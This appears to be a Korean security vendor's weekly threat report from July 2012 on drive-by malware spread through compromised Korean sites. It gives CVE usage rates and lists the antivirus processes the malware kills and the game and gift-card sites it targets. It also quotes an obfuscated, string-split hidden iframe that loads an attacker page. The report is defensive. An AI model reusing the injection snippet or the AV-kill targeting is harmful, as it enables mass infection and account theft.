태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

빛스캔과 KAIST 사이버보안연구센터에서 공동 운영하는 보안정보 제공 서비스 7월 2주차 국내 인터넷 환경의 위협 분석 내용이며 본 보고서는 빛스캔의 PCDS( Pre Crime Detect System )의 탐지역량과 KAIST 정보보호대학원, 사이버보안센터의 분석 역량이 결집된 분석 보고서입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응을 하도록 방향 제시를 하고 있습니다.


본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영되고 있습니다.

본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.


  1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지
  1. 악성링크가 공격에 활용에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치
  1. 내부 감염된 APT 공격의 확인 제거에 활용(기술 분석 문서 참고)

  • 보고서 내용 중에 기술분석 보고서에는 악성링크의 유형과 실제 감염을 시키는 악성코드의 타입에 따라 보고서가 기술되어 있습니다. 각각은 별개이므로 악성링크(사용자 PC 악성코드를 내리기 위한 공격코드) 대한 분석과 실제 악성코드의 행위와 기능에 대한 분석 시에 참고 하세요. 각각의 악성링크의 분석에는 최종 다운로드 되는 악성코드까지 기술이 되어 있습니다. 금주 차에는 악성 BHO 파일 분석에 대한 전문분석이 포함되어 있습니다. 전문분석은 Professional Service 받는 고객이 있을 경우 해당 고객에게만 전달이 됩니다. 참고 하세요.
  • 추가적으로 지난 주에 전달 드렸던 XML 취약성 관련 전문분석 자료는 금주 중 공개적으로 릴리즈 될 예정이며 국문/영문 판으로 공개 예정입니다.



금주 차의 특징은 제로데이(CVE 2012-1889 MS XML Core Service) 주중 패치로 인하여 공격 성공률이 낮아짐에 따라 적극적으로 활용하던 전주까지의 공격 상황과 비교하여 극적으로 사용 비율이 감소 되었으며, Java 관련된 공격 코드의 사용 비율이 높아진 상황을 보이고 있습니다. 또한 방문자가 많은 서비스들에 집중하여 효율적으로 공격을 수행 한 상황이며 현재는 여러 사이트들에 접근 통계를 확인 하기 위한 링크들이 다수 발견 되고 있는 것으로 보아 금주 차에는 다시 범위를 넓혀서 공격 성공률을 높이는 공격이 증가 될 것으로 판단 됩니다.


“비용 대비 효과”라는 기본 전술에 맞게끔 공격자들은 항상 일정 수준의 효과를 기대하고 있으며, 공격 성공률이 높을 경우에는 방문자가 많은 몇 개의 주요 사이트만을 공격 하여 악성코드 유포에 활용 하는 양상이 관찰 되었습니다. 또한 공격 성공률이 낮아진 상황에서는 다시 일정 수치의 효과를 얻기 위해 범위를 확장 시킬 것은 분명해 보입니다. 현재 여러 곳들에서 관찰 용도로 사용 되는 통계 정보를 수집 하고 있음은 금주의 대량 공격이 발생할 가능성이 높음을 반증 하고 있는 상황입니다. 따라서 다수의 서비스 사이트들이 악성코드 유포에 이용 되는 침해사고 발생이 우려 되고 있으므로 주의를 기울이시기 바랍니다.



CVE-2012-1889 포함 공격 비율은 6 4주차 82%, 7 1주차 96% 증가하며 대부분의 악성링크들이 해당 취약점을 이용하는 것으로 관찰 되었으나, 금주의 분석에서는 공격 비율이 상당히 감소했습니다. 7 2주차에 분석된 악성링크 CVE-2012-1889 취약점의 포함비율은 31% 입니다. MS 패치 이외에도 Java 관련된 업데이트를 반드시 적용 해야 합니다. ( http://technet.microsoft.com/ko-kr/security/bulletin/MS12-043 자동 업데이트 서비스 활성화를 해두시면 적용이 됩니다. )





<공격에 사용된 악성링크중 XML 취약성 공격 포함 비율>

전체 악성링크의 개수는 지난 7 1주에 비해 증가하였으나, CVE-2012-1889 취약점 이용 링크의 개수는 1/4 크게 줄었음을 확인 할 수 있습니다. 전체 공격 취약성 비율에서는 Java 관련된 공격 ( CVE 2012-0754 , 2011-3544 - 하단 링크 참조)이 공격 코드 상의 다수를 차지함을 확인 할 수 있으며 이것은 공격자들이 유기적으로 공격기법을 활용하고 있음을 의미합니다. 즉시 반응을 하는 유기적 공격 전략이 계속 되고 있는 상황입니다.




< 전체 악성링크의 감소와 XML 취약성 공격 포함 비율 챠트>

전주 대비 악성링크가 증가된 비율을 보이고 있으며 MS 패치로 인한 공격성공률의 감소로 인해 6 3주차 이후 5~20 이내의 MalwareNet 다시 활성화될 조짐을 보이고 있습니다. 특히 6 1주차부터 악용된 거대 MalwareNet중 하나에서는 현재 보고서를 작성하는 시점에도 공격자들은 통계 페이지를 넣어 접속자들을 관찰하는 상황입니다. 항상 그들은 지켜보고 있습니다.

금주 차 공격에서는 대규모 악성코드 감염을 위해 잘 사용 되지 않던 CVE-2012-1875(Microsoft Internet Explorer Same ID Property Remote Code Execution Vulnerability), CVE-2012-1723(Oracle Java Applet Field Bytecode Verifier Cache Remote Code Execution) 사용이 발견 되었으며 현재 각 공격 기법에 대해 전문분석 진행 중입니다.

모든 악성링크들은 초기에 사용자 브라우저 종류 버전을 체크하고 그에 맞는 공격 부분으로 분기를 합니다. 공격성공률을 확인하기 위한 통계 정보 수집은 항상 존재하며, IE, Java, Flash 부분에 대한 권한 획득 부분으로 분기하여 그에 맞는 공격코드들을 실행합니다. 이후 PC 권한을 획득하고 최종 악성코드들을 다운로드 하여 PC 설치하게 됩니다. 공격 성공률이 제로데이 출현 이전에는 60%(10명중 6 감염), 패치가 나오기 전까지인 적극적 활용 단계에서는 최소90% 수준으로 예상이 되었으며 7월 1주차 보고서에서 예측한 것과 같이 패치가 나오자 제로데이 출현이전에 사용되고 있던 Malwarenet의 활용과 새로운 공격기법의 추가적 검증이 진행 되고 있는 현재 상황입니다.



금주 공격의 특징은 다음과 같습니다.


  • MalwareNet 재활성화 ( 5~20개 규모의 신규 Malwarenet 출현)
  • P2P 언론 매체를 통한 악성코드 유포뿐만 아니라, 언어진흥원, 거래사이트, 연구회, 동영상 사이트 다양한 사이트들을 활용한 악성코드 유포가 이루어지고 있다. 특히 동영상 사이트 같은 경우 핫이슈에 대해 순간 접속자가 몰리는 현상을 보이고 있는데 공격자들은 매우 효율적으로 악성코드 유포에 활용 하고 있습니다. 금주차에 발견된 내용은 탐지를 어렵게 하기 위해 Space, Tab 코드 값을 이용하여 관리자가 인지하기 어려운 형태의 악성링크를 소스에 추가한 형태가 발견 되었습니다.
  • 최초 악성링크 내에 추가적인 연결 링크들을 갖추고 있는 형태 다양한 취약성을 공격하는 하이브리드 형태의 악성링크 공격 계속
  • 다운로더 및 백도어 형태의 악성코드 유포 증가 – 향후 어떤 방식으로 진화할 지 주목하고 있습니다.
  • 게임 계정 이외에 문화상품권 게임머니 거래 사이트에 대한 계정 탈취 시도가 최초 발견 되었습니다.
  • 대부분의 게임 계정 탈취 백신 서비스 killing 계속 되었으며, 계정 탈취는 BHO 이용한 유형이 가장 많이 발견 되고 있어 해당 부분에 대한 전문분석을 금주 보고서에서 전달 드리며, 6 4주차에 전달 드린 악성행위 분석에 대한 전문분석에 이어진 연결 문서입니다.


* 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’라고 정의 하고 있습니다.



금주 공격에 사용되었던 악성링크는 방송사의 웹서비스이며 유력 언론 매체 10여 곳에서 동시에 악성코드 유포에 활용 되었습니다. 악성링크로 직접 이용 됨에 따라 기술보고서에는 실제 링크가 기술 되어 있습니다. 현재에도 링크는 살아 있으며 악성링크로 이용된 경로는 www.xxxxxx.com/teachHope/ad.php (현재도 활성화 상태이므로 클릭 금지 입니다.)입니다. 내부 소스를 보시면 다음과 같은 코드를 확인 할 수 있습니다.


"<ifr"+"ame sr"+"c=ht"+"tp://xxxx.b"+"ulawz.in"+"fo/in"+"dex.h"+"tm wid"+"th=1 hei"+"ght=1></if"+"rame>");}


이런 유형으로 넣은 이유는 탐지 회피를 위한 목적이 가장 큰 목적입니다. 또한 방송사의 서비스를 해킹하여 악성코드 중계지로 직접 활용 하였고 이 링크를 주요 언론사에 추가함으로써 신뢰성을 확보하려는 목적으로 판정 되고 있습니다.

* 모든 외부 링크들은 Blank 처리 되어 공개 됩니다. 정식 보고서 및 분석 메일에는 정상 표시 되어 있습니다.


해당 코드는 Java 관련된 공격코드인 CVE 2012-1723 공격코드를 사용하고 있으며 현재 상태에서는 다운로더로 판정이 되고 있습니다. 즉 추가적인 공격코드 및 기능들이 차후 업데이트될 가능성이 충분히 높은 상황이라 할 수 있습니다.


사용자 PC 대한 직접적인 공격을 일으키는 취약성은 복합적으로 사용되고 있으며, 지금까지 많은 비중을 차지 하였던 MS XML 취약성 공격을 대폭 감소되었고 Java 취약성 Flash 취약성 공격은 예전과 같은 비율이나 상대적으로 높은 비율을 보이고 있습니다.

사용자 PC 설치되는 악성코드들은 항상 백신을 우회해서 설치가 되고 계속해서 변형들이 출현하고 있는 상황에서 서핑만 해도, 서비스에 방문만 해도 감염이 되는 공격코드들은 창궐하고 있습니다. 항상 말씀 드렸듯이 패치가 없는 상태에서 제로데이 공격코드가 대규모로 공격에 이용되는 상황을 가장 염려하고 있으며 사후 대응이 아니라 사전 대응에 중점을 두어야 된다고 주장한 강력한 원인이기도 합니다.


현재 모든 솔루션들은 사후 대응에 중점을 두고 있는데, 가장 중요한 것은 사전에 대응이 되는 것이냐가 핵심입니다. 또한 발생 가능한 위험을 얼마나 컨트롤 있는지가 핵심이라 있으며, 문제 해결책을 찾을 있을 것입니다. 이번 XML 사안에서 보듯이 3 가량 무방비 상태에서 노출이 되었으며 3주 만에 공격자들은 해당 취약성을 대거 이용하는 형태를 보일 정도로 빠른 적응력을 보이고 있습니다. 향후에도 패치가 없는 제로데이 출현 시 빠르게 공격에 활용 될 것으로 보이므로 사후 대응 측면보다는 사전에 위협을 제거할 있는 선제적인 대응력이 핵심이 되어야 것입니다.


  • Oracle Java 취약성, Adobe Flash 취약성 , MS의 XML , Midi 및 IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다. 특히 패치가 발표된 MS XML (CVE 2012-1889) 취약성의 경우 업데이트를 하지 않은 분은 반드시 업데이트를 적용 하시기 바랍니다.

  • 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다. 또한 백도어 기능의 설치 시에는 시스템상의 백신 프로세스 Kill 이후에 루트킷 형태를 설치하고 이후 다운로드 받은 모든 악성코드와 실행 주체를 삭제하여 정체를 은폐하고 있으므로 사전 대응에 만전을 기하세요.

  • 기술분석보고서에 언급된 게임계정 유출 악성코드들은 전체 악성코드의 80% 이상이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.


Diablo III에 대한 공격이 추가된 게임 계정 모니터링 및 백신 Kill 항목, 게임 머니 및 문화상품권 탈취 목록 추가


* 본 내용은 최근의 악성코드들이 기본적으로 탑재하고 있는 기능이며 6월 4주차 까지 발견 되었던 백신과 게임 계정 탈취 이외에도 문화상품권과 게임 머니 사이트에 대한 계정 탈취 기능이 추가 되었습니다. 모든 기능은 BHO 관련된 공격에 연관 되어 있으며 해당 문제들은 첨부된 BHO 공격에 대한 전문분석 자료를 참고 하세요. - 보고서 구독 기관에만 제공 됩니다.


프로세스명

프로그램명

백 신

sgbider.exe, vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc, nsvmon.npc

Nsavsvc.npc, NaverAgent.exe

네이버백신

V3LRun.exe, MUpdate2.exe

SgSvc.exe

V3Light.exe, V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye,

AYRTSrv.aye, SkyMon.exe

AYServiceNT.aye

AYupdate.aye, AyAgent.aye

알약

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com, dnf.exe

던전 앤 파이터

DragonNest.exe, dragonnest.nexon.com

드래곤 네스트

WinBaram.exe, baram.nexon.com

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

clubaudition.ndolfin.com

클럽 오디션

www.capogames.net, samwinfo.capogames.net

삼국지w

Diablo III.exe

디아블로III

게임머니&문화상품권

www.booknlife.com

북앤라이프

www.cultureland.co.kr

컬쳐랜드

www.happymoney.co.kr

해피머니

www.teencach.co.kr

틴캐시


본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다.

금일 이전까지 패치가 없는 상태에서 피해는 매우 심각한 상황 이였을 것으로 예상 되고 있습니다.



금주 공격에 사용된 취약성 비율

상세 분석 진행에 따라 취약성 판정 비율이 일정 부분 달라지고 있습니다만 큰 흐름은 차이가 없습니다. 공격이 많이 복잡한 형태를 띄고 있어서 정확한 CVE 판정이 어려운 상황은 계속 되고 있습니다.

- CVE-2012-0507(21, 28.7%) Java Applet 취약성 - Java Web start 취약성

http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html

- CVE 2011-3544(19, 26.0%) Java Applet 취약성

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-1889(9건, 12.3%) MS XML Core Service 취약성

http://technet.microsoft.com/ko-kr/security/advisory/2719615

- CVE 2012-0754 (9건, 12.3%) Flash 취약성 –

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2012-0003 (9건, 12.3%) Windows Midi 취약성 –

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003

- CVE-2012-1723 (4, 5.6%) 자바 애플릿 취약점

http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html

- CVE-2012-1875 (2건, 2.8%) IE 취약성(6,7,8,9)

http://technet.microsoft.com/ko-kr/security/bulletin/MS12-036





취약성 비율을 살펴 보시면 아시겠지만 XML 서비스에 대한 공격은 여전히 유효하며 Java 취약성들이 적극적으로 활용 되고 있는 상태를 확인 할 수 있습니다.


악성링크의 국가별 주간 통계





현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분 및 차단에 관련된 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 또한 어떤 방식으로든 공격자들은 빛스캔의 악성링크 탐지와 분석 내용에 대해서 인지를 일부 하고 있는 것으로 판단 됩니다. 또한 금주의 총평으로는 제로데이의 패치로 인한 MalwareNet의 재활성화 및 관찰입니다. 향후에도 이번 XML 관련 제로데이 사례에서 보듯 유사 사례는 계속 발생할 것으로 예상되고 있습니다. 대규모 유포 시도에 대해서 활용 된다면 언제나 가장 먼저 정보 제공이 가능함을 약속 드립니다.



본 정보제공 서비스는 공개, 배포 금지( 내부에서만 활용), 비영리 목적으로만 활용 가능합니다.


공익적인 목적으로 기관에 제공 되는 서비스들은 내부 사정에 의해 언제든 종료 될 수 있습니다.

감사합니다.



*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다. KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.


* 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 본 서비스의 권리는 빛스캔에 있으므로 공개적 활용 및 영리적 목적으로 활용 하실 수 없습니다.


* 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해 수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.


Posted by 바다란

댓글을 달아 주세요